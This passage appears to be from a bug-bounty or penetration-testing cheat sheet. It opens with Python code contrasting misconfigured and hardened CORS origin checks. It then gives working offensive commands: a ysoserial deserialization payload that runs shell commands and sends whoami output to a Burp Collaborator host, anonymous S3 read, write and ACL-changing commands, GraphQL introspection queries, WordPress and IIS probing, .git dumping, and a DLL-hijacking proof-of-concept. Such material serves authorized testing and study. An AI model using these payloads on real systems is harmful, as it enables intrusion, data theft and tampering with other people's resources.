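    """Misconfiguration 2: allowlist plus the literal 'null' origin, which a
    sandboxed iframe or a data: URL sends, so any site can obtain it."""
    if origin == "null" or origin in TRUSTED_ORIGINS:
        return grant(origin)
    return {}


def any_scheme_subdomain(origin):
    """Misconfiguration 3: trusts every subdomain regardless of scheme, so an
    XSS on an http:// subdomain can read the https:// site's responses. The
    plain suffix test also lets 'https://evil-example' through."""
    if origin and origin.endswith(TRUSTED_PARENT):
        return grant(origin)
    return {}


def strict(origin):
    """Hardened decision: exact https origins, or https subdomains of the
    trusted zone, parsed rather than string-matched. Everything else gets no
    CORS headers at all, so the browser blocks the cross-origin read."""
    if not origin or origin == "null":
        return {}
    p = urlsplit(origin)
    if p.scheme != "https":
        return {}
    if p.username or p.password or p.path or p.query or p.fragment:
        return {}                              # an Origin header is scheme://host[:port] only
    host = (p.hostname or "").lower()
    if origin in TRUSTED_ORIGINS or host.endswith("." + TRUSTED_PARENT):
        return grant(origin)
    return {}


if __name__ == "__main__":
    for o in ("https://malicious-website.com", "null", "http://stock.app.example",
              "https://evil-example", "https://app.example"):
        print("%-30s strict -> %s" % (o, strict(o).get("Access-Control-Allow-Origin")))
```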
Ysoserial
Because of `Runtime.exec()`, ysoserial doesn't work well with multiple commands. After some research, I found a way to run multiple sys commands anyway, by using `sh -c $@|sh . echo` before the multiple commands that we need to run. Here I needed to run the commands `host` and `whoami`:
```sh
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections7 'sh -c $@|sh . echo host $(whoami).<MY-'RATOR-ID>.burpcollaborator.net' | gzip | base64
```
PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically.
Burp extensions:
- Java Deserialization Scanner
- Java Serialized Payloads
- GadgetProbe
- Freddy, Deserialization Bug Finder
- PHP Object Injection Check
- "If someone sends a cookie called '0', automattic.com responds with a list of all 152 cookies supported by the application: `curl -v -H 'Cookie: 0=1' https://automattic.com/?cb=123 | fgrep Cookie`" [Reference];
- CRLF injection [Reference], "When you find response header injection, you can probably do better than mere XSS or open-redir. Try injecting a short Content-Length header to cause a reverse desync and exploit random live users." [Reference]
Target example: `http://[name_of_bucket].s3.amazonaws.com`
Read Permission
- `aws s3 ls s3://[name_of_bucket] --no-sign-request`
- `aws s3 ls s3://pyx-pkgs --recursive --human-readable --summarize`
Write Permission
- `aws s3 cp localfile s3://[name_of_bucket]/test_file.txt --no-sign-request`
READ_ACP
- `aws s3api get-bucket-acl --bucket [bucketname] --no-sign-request`
- `aws s3api get-object-acl --bucket [bucketname] --key index.html --no-sign-request`
WRITE_ACP
- `aws s3api put-bucket-acl --bucket [bucketname] [ACLPERMISSIONS] --no-sign-request`
- `aws s3api put-object-acl --bucket [bucketname] --key file.txt [ACLPERMISSIONS] --no-sign-request`
Tools
- Anonymous Cloud
- AWS CLI
- S3Scanner A tool to find open S3 buckets and dump their contents
- Cloud - AWS Pentest
- s3enum
Resources
- https://blog.yeswehack.com/yeswerhackers/abusing-s3-bucket-permissions/
- https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_examples_s3_rw-bucket.html
To analyze the schema: vangoncharov.github.io/graphql-voyager/ or InQL for Burp Suite.
GraphQL Introspection query
```json
{"query": "{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
```
```
{query: __schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
```
```json
{"operationName":"IntrospectionQuery","variables":{},"query":"query IntrospectionQuery {\n __schema {\n queryType {\n name\n }\n mutationType {\n name\n }\n subscriptionType {\n name\n }\n types {\n ...FullType\n }\n directives {\n name\n description\n locations\n args {\n ...InputValue\n }\n }\n }\n}\n\nfragment FullType on __Type {\n kind\n name\n description\n fields(includeDeprecated: true) {\n name\n description\n args {\n ...InputValue\n }\n type {\n ...TypeRef\n }\n isDeprecated\n deprecationReason\n }\n inputFields {\n ...InputValue\n }\n interfaces {\n ...TypeRef\n }\n enumValues(includeDeprecated: true) {\n name\n description\n isDeprecated\n deprecationReason\n }\n possibleTypes {\n ...TypeRef\n }\n}\n\nfragment InputValue on __InputValue {\n name\n description\n type {\n ...TypeRef\n }\n defaultValue\n}\n\nfragment TypeRef on __Type {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n }\n }\n }\n }\n }\n }\n }\n}\n"}
```
- Information Disclosure [high]: `/_wpeprivate/config.json`
- Data exposure: `/wp-json/wp/v2/users/`, `/wp-json/th/v1/user_generation`, `/?rest_route=/wp/v2/users`
- xmlrpc.php enabled, reference. Send a POST request to this endpoint with a body like this:
  ```xml
  <?xml version="1.0" encoding="utf-8"?>
  <methodCall>
    <methodName>system.listMethods</methodName>
    <params></params>
  </methodCall>
  ```
- Use Nuclei to detect WordPress websites from a list of targets with: `nuclei -l subdomains.txt -t %USERPROFILE%/nuclei-templates/technologies/wordpress-detect.yaml`
- Scan with WPScan github.com/wpscanteam/wpscan with: `wpscan --url <domain> --api-token <your-api-token>`
Resources
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md
- https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/
- WordPress Checklist
- Wordlist iisfinal.txt
- Check if `trace.axd` is enabled
- Other common files
- Search for `Views/web.config`, `bin/WebApplication1.dll`, `System.Web.Mvc.dll`, `System.Web.Mvc.Ajax.dll`, `System.Web.Mvc.Html.dll`, `System.Web.Optimization.dll`, `System.Web.Routing.dll`
- Find Lotus Domino with nuclei: `%USERPROFILE%\nuclei-templates\technologies\lotus-domino-version.yaml`
- Exploit DB: Lotus-Domino
- Fuzzing list: SecLists/LotusNotes.fuzz.txt
Once you have the source code, look for the secrets within the files.
Tools
- DotGit find if a website has `.git` exposed
- nuclei template: `%USERPROFILE%\nuclei-templates\exposures\configs\git-config.yaml`
- GitDumper from GitTools
Tools
- Can I take over XYZ?
- nuclei template: `%USERPROFILE%\nuclei-templates\takeovers`
Tools
- Process Monitor to see which DLLs are missing for an exe and do DLL Hijacking
Using Process Monitor, set the filters to find missing DLLs.
After that, insert the DLL in the position of the missing ones with the same name. An example of a DLL:
```c
#include <windows.h>

/* Minimal PoC DLL: when the target process loads it from the hijacked
 * search path, DllMain runs on attach and shows a message box. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
    (void)hinstDLL;
    (void)lpReserved;
    switch (dwReason) {
        case DLL_PROCESS_ATTACH:
            /* MessageBoxA: narrow strings, so it builds with or without UNICODE */
            MessageBoxA(NULL, "success!!", "pwned", MB_ICONERROR | MB_OK);
            break;
    }
    return TRUE;
}
```
Resources